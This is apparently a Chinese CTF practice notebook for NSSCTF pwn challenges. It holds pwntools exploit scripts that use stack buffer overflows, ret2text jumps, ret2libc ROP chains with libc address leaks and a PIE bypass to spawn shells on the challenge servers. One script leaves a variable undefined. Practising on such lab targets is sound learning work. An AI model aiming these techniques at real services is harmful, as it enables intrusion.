NSSCTF_pwn_刷题笔记page(1)
[SWPUCTF 2021 新生赛]gift_pwn
1
2
3
4
5
6
7
8
9
| from pwn import *
io = remote('node4.anna.nssctf.cn',28991)
padding = 16+8
shell = 0x4005B6
payload = b'A'*padding+p64(shell)
io.sendline(payload)
io.interactive()
|
[SWPUCTF 2021 新生赛]whitegive_pwn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28982)
#io = gdb.debug('./附件')
elf = ELF('./附件')
padding = 16+8
pop_rdi = 0x0000000000400763
payload = b'A'*padding + p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
io.sendline(payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
base_offset = puts_addr - 0x06f6a0
sys = 0x0453a0+base_offset
bin_sh = 0x18ce57+base_offset
payload1 = b'A'*padding+p64(pop_rdi)+p64(bin_sh)+p64(sys)
io.sendline(payload1)
io.interactive()
|
libc版本要另外搜索
###[CISCN 2019华北]PWN1
1
2
3
4
5
6
7
| from pwn import *
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28020)
padding = 44
payload =b'A'*padding+p64(0x41348000)
io.sendlineafter(b'number.',payload)
io.interactive()
|
1
2
3
4
5
6
7
| from pwn import *
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28020)
padding = 56
payload =b'A'*padding+p64(0x4006be)
io.sendlineafter(b'number.',payload)
io.interactive()
|
[NISACTF 2022]ReorPwn?
[BJDCTF 2020]babystack2.0
1
2
3
4
5
6
7
8
9
10
11
12
13
| from pwn import *
context.log_level = 'debug'
#io = process('./pwn')
#io = gdb.debug('./pwn')
io = remote('node4.anna.nssctf.cn',28485)
padding = 12+8+4
payload = b'A'*padding+p64(0x400726)
io.sendlineafter('name:\n',b'-1')
io.sendlineafter('name?\n',payload)
io.interactive()
#本地要栈对齐
|
ida判断的栈空间不正确,手动调试一下
[HNCTF 2022 Week1]easync
nc进去找,格式为nssctf{}
[BJDCTF 2020]babystack
1
2
3
4
5
6
7
8
9
10
11
12
13
| from pwn import *
context.log_level = 'debug'
#io = process('./ret2text')
#io = gdb.debug('./ret2text')
io = remote('node4.anna.nssctf.cn',28587)
padding = 12+8+4
payload = b'A'*padding+p64(0x4006e6)
io.sendlineafter('name:\n',b'100')
io.sendlineafter('?\n',payload)
io.interactive()
#本地要栈对齐
|
ida判断的栈空间不正确,手动调试一下
[SWPUCTF 2022 新生赛]Does your nc work?
nc进去找
[NISACTF 2022]ezstack
1
2
3
4
5
6
7
8
9
10
| from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28318)
elf = ELF('./pwn')
padding = 72+4
payload = b'A'*padding + p32(0x8048512)+p32(0x804A024)
io.sendline(payload)
io.interactive()
|
32位程序调用函数方法与64位不同
[watevrCTF 2019]Voting Machine 1
1
2
3
4
5
6
7
8
| from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28007)
payload = b'A'*padding + p64(0x400807)
io.sendline(payload)
io.recvall()
io.interactive()
|
有后门函数…
[NISACTF 2022]ezpie
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28323)
padding = 44
io.recvuntil(b'gift!\n')
main_addr = eval(io.recvline().decode())
base_offset = main_addr - 0x770
shell_addr = base_offset+0x80F
payload = b'A'*padding +p32(shell_addr)
io.sendline(payload)
io.interactive()
|
主要是pie机制,和泄露lib差不多的思路
[HGAME 2023 week1]test_nc
[GFCTF 2021]where_is_shell
1
2
3
4
5
6
7
8
9
10
11
12
13
| from pwn import *
#io = process('./shell')
io = remote('node4.anna.nssctf.cn',28065)
elf = ELF('./shell')
pop_rdi = 0x00000000004005e3 #: pop rdi ; ret
sys_addr = 0x400557
ret_addr = 0x0000000000400416 #: ret
padding = 0x10+8
payload = b'A'*padding+p64(ret_addr)+p64(pop_rdi)+p64(0x400541)+p64(elf.plt['system'])+p64(ret_addr)
io.sendline(payload)
io.interactive()
|
可以利用system($0)获得shell权限,$0在机器码中为 \x24\x30,tips函数中提供了相应的机器码,又一个小知识点
[HNCTF 2022 Week1]easyoverflow
1
| 1111111111111111111111111111111111111111111111111111
|
参数覆盖,溢出v4覆盖v5